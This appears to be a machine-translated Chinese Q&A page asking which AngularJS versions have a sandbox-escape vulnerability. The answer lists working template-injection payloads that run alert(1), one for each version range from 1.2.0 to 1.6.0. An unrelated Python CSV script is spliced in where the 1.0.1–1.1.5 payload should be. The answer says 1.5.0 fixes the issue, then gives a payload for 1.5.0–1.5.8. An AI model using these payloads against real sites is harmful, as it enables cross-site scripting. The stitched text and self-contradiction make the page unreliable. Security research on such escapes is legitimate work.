我最近偶然发现了文章https://gist.github.com/molnarg/5348cd4254cabc1d4f7b。它描述了AngularJS中的沙箱逃逸漏洞。该漏洞已在AngularJS 1.3.2中修复。
AngularJS 1.2.26和1.2.27也容易受到攻击吗? Retirejs说它是http://retirejs.github.io/retire.js/,但在原始文章和AngularJS文档中都没有关于它的说明。
答案 0 :(得分:2)
从Angular Blog推断,版本1.5.0应该已经解决了这个问题。 它不会出现在易受攻击版本的列表中(下面)。
通过分析和识别Angular代码库中的安全问题,已经有很多人通过最后几个版本为该项目做出了贡献,然后我们修复了这个问题。我们非常感谢这些人所做的工作。我们特别要感谢Mario Heiderich,Gareth Heyes和Jann Horn以及Google的安全团队。
以下是截至05/09/2016的漏洞及其适用的版本列表,取自PortSwigger:http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
1.0.1 - 1.1.5 Mario Heiderich(Cure53)
import csv
def parse_csv_file(rawCSVFile):
fileLineList = []
with open(rawCSVFile, newline='') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
fileLineList.append(row)
return fileLineList
def main():
uniqueColumnValues = set()
fileLineList = parse_csv_file('sample.csv')
for row in fileLineList:
uniqueColumnValues.add(row[1]) # Selecting 2nd column here.
print(uniqueColumnValues)
if __name__ == '__main__':
main()
1.2.0 - 1.2.1 Jan Horn(Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.2 - 1.2.5 Gareth Heyes(PortSwigger)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.6 - 1.2.18 Jan Horn(Cure53)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1.2.19 - 1.2.23 Mathias Karlsson
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.24 - 1.2.29 Gareth Heyes(PortSwigger)
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.3.0 GáborMolnár(谷歌)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1.3.1 - 1.3.2 Gareth Heyes(PortSwigger)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.3 - 1.3.18 Gareth Heyes(PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.19 Gareth Heyes(PortSwigger)
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.20 Gareth Heyes(PortSwigger)
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.4.0 - 1.4.9 Gareth Heyes(PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.5.0 - 1.5.8 Ian Hickey
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.6.0
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}